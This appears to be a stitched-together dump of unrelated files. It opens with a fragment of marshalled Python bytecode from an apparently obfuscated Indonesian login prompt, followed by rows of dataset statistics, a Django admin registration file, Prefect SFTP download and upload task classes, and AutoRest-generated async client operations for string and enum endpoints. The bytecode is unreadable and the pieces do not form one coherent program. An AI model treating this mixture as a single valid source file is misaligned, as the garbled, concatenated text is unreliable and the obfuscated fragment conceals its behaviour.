[?]\x1b[00ms\x1f\x00\x00\x00\x1b[31;1mSilahkan Coba lagi...!!\n(\x05\x00\x00\x00t\t\x00\x00\x00raw_inputt\x08\x00\x00\x00usernamet\x08\x00\x00\x00passwordR\x0e\x00\x00\x00t\x04\x00\x00\x00exit(\x02\x00\x00\x00t\x05\x00\x00\x00unamet\x03\x00\x00\x00pwd(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x04\x00\x00\x00main/\x00\x00\x00s\x14\x00\x00\x00\x00\x02\x0c\x02\x0c\x02\x0c\x04\x0c\x02\x04\x02\r\x06\x05\x02\x08\x08\x05\x02t\x05\x00\x00\x00clear(\r\x00\x00\x00R\x10\x00\x00\x00R\x0e\x00\x00\x00t\x04\x00\x00\x00timet\x06\x00\x00\x00randomt\x05\x00\x00\x00sleept\x08\x00\x00\x00platformR\n\x00\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x14\x00\x00\x00R\x1b\x00\x00\x00t\x11\x00\x00\x00KeyboardInterruptt\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s.\x00\x00\x00\x18\x01\x0c\x01\x0c\x01\x0c\x01\t\x01\x18\x01\t\x08\x03\x06\x07\x01\n\x01\n\x02\x05\x02\x05\x02\x05\x02\x05\x02\x06\x02\x06\x04\t\x08\t%\x03\x02\x0b\x02\r\x02\r\x02'''))
| 2,254
| 4,493
| 0.732697
| 953
| 4,508
| 3.440714
| 0.161595
| 0.353156
| 0.203111
| 0.128088
| 0.353156
| 0.264105
| 0.174748
| 0.139677
| 0.132357
| 0.122598
| 0
| 0.383371
| 0.026176
| 4,508
| 2
| 4,493
| 2,254
| 0.363554
| 0
| 0
| 0
| 0
| 0.5
| 0.990464
| 0.924817
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 13
|
7ca30904334758be188e88d77333404500f838b9
| 164
|
py
|
Python
|
budgetsupervisor/budget/admin.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 1
|
2022-03-01T10:28:31.000Z
|
2022-03-01T10:28:31.000Z
|
budgetsupervisor/budget/admin.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 75
|
2020-11-07T20:14:55.000Z
|
2021-10-05T15:08:22.000Z
|
budgetsupervisor/budget/admin.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Account, Category, Connection, Transaction
admin.site.register((Account, Category, Connection, Transaction))
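# Registering the models without a custom ModelAdmin gives each of them the
# default change list and edit forms in the Django admin.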
| 27.333333
| 65
| 0.810976
| 19
| 164
| 7
| 0.631579
| 0.225564
| 0.37594
| 0.541353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103659
| 164
| 5
| 66
| 32.8
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7ccd23c853f32281523e16d82fd560482d1c89f5
| 8,048
|
py
|
Python
|
src/prefect/tasks/sftp/sftp.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/sftp/sftp.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/sftp/sftp.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
import os.path
import contextlib
from typing import Optional
from paramiko import Transport, SFTPClient, SFTPError
from prefect import Task
from prefect.utilities.tasks import defaults_from_attrs
class SftpDownload(Task):
"""
Task for downloading files from an SFTP server.
Downloads the remote file into the sftp_downloads/ folder by default.
Args:
- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
- port_number (int): The port to connect to the server.
- remote_path (str): The remote SFTP file path.
- local_path (str): The local file path to download the file to.
- **kwargs (dict, optional): Additional keyword arguments to pass to the Task constructor.
Raises:
- ValueError: Raised if a required parameter is not supplied.
- ClientError: Raised if an exception occurs when connecting to or downloading from the server.
"""
def __init__(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
**kwargs,
):
self.host = host
self.username = username
self.password = password
self.port_number = port_number
self.remote_path = remote_path
self.local_path = local_path
super().__init__(**kwargs)
def _create_connection(self) -> Optional[SFTPClient]:
"""
Initialize the connection with the SFTP server.
:return: Optional[SFTPClient]
"""
transport = Transport(sock=(self.host, self.port_number))
transport.connect(username=self.username, password=self.password)
# self._connection = SFTPClient.from_transport(transport)
connection = SFTPClient.from_transport(transport)
self.logger.info(f"connected to {self.host}, {self.port_number}")
return connection
def file_exists(self, remote_path: str, conn: SFTPClient):
"""
Checks if file exists in remote path or not.
Args:
- remote_path (str): Remote file path to check if file exists.
- conn (SFTPClient): The connection object for the SFTP server.
"""
try:
self.logger.info(f"remote path : {remote_path}")
conn.stat(remote_path)
except SFTPError as e:
self.logger.debug(
f"The specified file on this '{remote_path}' remote_path does not exist."
)
raise e
@defaults_from_attrs(
"host", "username", "password", "port_number", "remote_path", "local_path"
)
def run(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
):
"""
Task for downloading files from an SFTP server.
Args:
- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
        - port_number (int): The port number used to connect to the server.
- remote_path (str): The remote SFTP file path.
- local_path (str): The local file path to download file to.
Raises:
- ValueError: Raised if a required parameter is not supplied.
        - ClientError: Raised if an exception occurs when connecting to or downloading from the server.
"""
if not host:
raise ValueError("A host name must be provided")
if not username:
raise ValueError("User name must be provided")
if not password:
raise ValueError("A password must be provided")
if not port_number:
raise ValueError("A port_number name must be provided")
if not remote_path:
raise ValueError("A remote_path must be provided")
# set default to local path if arg not provided
self.local_path = (
"sftp_downloads/" + remote_path.split("/")[-1]
if local_path is None
else local_path
)
# check if local path exists or not
local_dir = "/".join(self.local_path.split("/")[:-1]) + "/"
if not os.path.isdir(local_dir):
os.mkdir(local_dir)
with contextlib.closing(self._create_connection()) as conn:
self.file_exists(remote_path, conn)
            conn.get(remote_path, self.local_path, callback=None)
class SftpUpload(Task):
"""
Task for uploading files to an SFTP server.
Args:
- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
- port_number (int): The port number to connect to the server.
- remote_path (str): The remote SFTP file path.
    - local_path (str): The local file path to upload from.
- **kwargs (dict, optional): Additional keyword arguments to pass to the Task constructor.
Raises:
- ValueError: Raised if a required parameter is not supplied.
    - ClientError: Raised if an exception occurs when connecting or uploading to the server.
"""
def __init__(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
**kwargs,
):
self.host = host
self.username = username
self.password = password
self.port_number = port_number
self.remote_path = remote_path
self.local_path = local_path
super().__init__(**kwargs)
def _create_connection(self) -> Optional[SFTPClient]:
"""
Initialize the connection with the SFTP server.
:return: Optional[SFTPClient]
"""
transport = Transport(sock=(self.host, self.port_number))
transport.connect(username=self.username, password=self.password)
connection = SFTPClient.from_transport(transport)
self.logger.info(f"connected to {self.host}, {self.port_number}")
return connection
@defaults_from_attrs(
"host", "username", "password", "port_number", "remote_path", "local_path"
)
def run(
self,
host: str = None,
username: str = None,
password: str = None,
port_number: int = None,
remote_path: str = None,
local_path: str = None,
):
"""
Task for uploading files to an SFTP server.
Args:
- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
- port_number (int): The port number to connect to the server.
- remote_path (str): The remote SFTP file path.
- local_path (str): The local file path to upload from.
Raises:
- ValueError: Raised if a required parameter is not supplied.
        - ClientError: Raised if an exception occurs when connecting or uploading to the server.
"""
if not host:
raise ValueError("A host name must be provided")
if not username:
raise ValueError("User name must be provided")
if not password:
raise ValueError("A password must be provided")
if not port_number:
raise ValueError("A port_number name must be provided")
if not remote_path:
raise ValueError("A remote_path must be provided")
if not local_path:
raise ValueError("A local_path must be provided")
with contextlib.closing(self._create_connection()) as conn:
conn.put(
localpath=local_path,
remotepath=remote_path,
confirm=True,
)
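# Minimal usage sketch, assuming a Prefect 1.x-style flow (this module lives
# under src/prefect/tasks). The host, credentials and paths below are
# placeholders, not values from the source.
from prefect import Flow

download = SftpDownload(
    host="sftp.example.com",   # placeholder
    username="demo",           # placeholder
    password="secret",         # placeholder
    port_number=22,
)

with Flow("sftp-download") as flow:
    # Values set on the task above are injected by @defaults_from_attrs;
    # arguments passed here override them for this run.
    download(remote_path="reports/latest.csv")

flow.run()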
| 35.768889
| 98
| 0.604871
| 954
| 8,048
| 4.984277
| 0.137317
| 0.063091
| 0.032387
| 0.030284
| 0.792219
| 0.782334
| 0.782334
| 0.782334
| 0.750158
| 0.750158
| 0
| 0.00036
| 0.310388
| 8,048
| 224
| 99
| 35.928571
| 0.856396
| 0.361456
| 0
| 0.714286
| 0
| 0
| 0.133887
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.111111
| 0.047619
| 0
| 0.134921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7ce1d323aae98bd5c71532484e332022d2b60f20
| 30,619
|
py
|
Python
|
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyStringVersionTolerant/bodystringversiontolerant/aio/operations/_operations.py
|
changlong-liu/autorest.python
|
1f03e4c6a11934d385fab050dc44041f1e91e9ff
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyStringVersionTolerant/bodystringversiontolerant/aio/operations/_operations.py
|
changlong-liu/autorest.python
|
1f03e4c6a11934d385fab050dc44041f1e91e9ff
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyStringVersionTolerant/bodystringversiontolerant/aio/operations/_operations.py
|
changlong-liu/autorest.python
|
1f03e4c6a11934d385fab050dc44041f1e91e9ff
|
[
"MIT"
] | null | null | null |
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Optional, TypeVar
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ...operations._operations import (
build_enum_get_not_expandable_request,
build_enum_get_referenced_constant_request,
build_enum_get_referenced_request,
build_enum_put_not_expandable_request,
build_enum_put_referenced_constant_request,
build_enum_put_referenced_request,
build_string_get_base64_encoded_request,
build_string_get_base64_url_encoded_request,
build_string_get_empty_request,
build_string_get_mbcs_request,
build_string_get_not_provided_request,
build_string_get_null_base64_url_encoded_request,
build_string_get_null_request,
build_string_get_whitespace_request,
build_string_put_base64_url_encoded_request,
build_string_put_empty_request,
build_string_put_mbcs_request,
build_string_put_null_request,
build_string_put_whitespace_request,
)
T = TypeVar("T")
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class StringOperations:
"""StringOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get_null(self, **kwargs: Any) -> Optional[str]:
"""Get null string value value.
:return: str or None
:rtype: str or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[Optional[str]]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_null_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_null(self, string_body: Optional[str] = None, **kwargs: Any) -> None:
"""Set string value null.
:param string_body: string body.
:type string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if string_body is not None:
_json = string_body
else:
_json = None
request = build_string_put_null_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_empty(self, **kwargs: Any) -> str:
"""Get empty string value value ''.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_empty_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_empty(self, **kwargs: Any) -> None:
"""Set string value empty ''.
:keyword string_body: string body. The default value is "". Note that overriding this default
value may result in unsupported behavior.
:paramtype string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
string_body = kwargs.pop("string_body", "") # type: str
request = build_string_put_empty_request(
content_type=content_type,
json=string_body,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_mbcs(self, **kwargs: Any) -> str:
"""Get mbcs string value '啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€'.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_mbcs_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_mbcs(self, **kwargs: Any) -> None:
"""Set string value mbcs '啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€'.
:keyword string_body: string body. The default value is
"啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€". Note that overriding
this default value may result in unsupported behavior.
:paramtype string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
string_body = kwargs.pop(
"string_body", "啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€"
) # type: str
request = build_string_put_mbcs_request(
content_type=content_type,
json=string_body,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_whitespace(self, **kwargs: Any) -> str:
"""Get string value with leading and trailing whitespace
':code:`<tab>`:code:`<space>`:code:`<space>`Now is the time for all good men to come to the aid
of their country:code:`<tab>`:code:`<space>`:code:`<space>`'.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_whitespace_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_whitespace(self, **kwargs: Any) -> None:
"""Set String value with leading and trailing whitespace
':code:`<tab>`:code:`<space>`:code:`<space>`Now is the time for all good men to come to the aid
of their country:code:`<tab>`:code:`<space>`:code:`<space>`'.
:keyword string_body: string body. The default value is " Now is the time for all good men
to come to the aid of their country ". Note that overriding this default value may result in
unsupported behavior.
:paramtype string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
string_body = kwargs.pop(
"string_body", " Now is the time for all good men to come to the aid of their country "
) # type: str
request = build_string_put_whitespace_request(
content_type=content_type,
json=string_body,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_not_provided(self, **kwargs: Any) -> str:
"""Get String value when no string value is sent in response payload.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_not_provided_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def get_base64_encoded(self, **kwargs: Any) -> bytearray:
"""Get value that is base64 encoded.
:return: bytearray
:rtype: bytearray
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bytearray]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_base64_encoded_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def get_base64_url_encoded(self, **kwargs: Any) -> bytes:
"""Get value that is base64url encoded.
:return: bytes
:rtype: bytes
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bytes]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_base64_url_encoded_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_base64_url_encoded(self, string_body: bytes, **kwargs: Any) -> None:
"""Put value that is base64url encoded.
:param string_body: string body.
:type string_body: bytes
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = string_body
request = build_string_put_base64_url_encoded_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_null_base64_url_encoded(self, **kwargs: Any) -> Optional[bytes]:
"""Get null value that is expected to be base64url encoded.
:return: bytes or None
:rtype: bytes or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[Optional[bytes]]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_null_base64_url_encoded_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
class EnumOperations:
"""EnumOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get_not_expandable(self, **kwargs: Any) -> str:
"""Get enum value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:return: str. Possible values are: "red color", "green-color", and "blue_color".
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == "str" # Optional.
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_enum_get_not_expandable_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_not_expandable(self, string_body: str, **kwargs: Any) -> None:
"""Sends value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:param string_body: string body. Possible values are: "red color", "green-color", and
"blue_color".
:type string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = string_body
request = build_enum_put_not_expandable_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_referenced(self, **kwargs: Any) -> str:
"""Get enum value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:return: str. Possible values are: "red color", "green-color", and "blue_color".
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == "str" # Optional.
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_enum_get_referenced_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_referenced(self, enum_string_body: str, **kwargs: Any) -> None:
"""Sends value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:param enum_string_body: enum string body. Possible values are: "red color", "green-color", and
"blue_color".
:type enum_string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = enum_string_body
request = build_enum_put_referenced_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
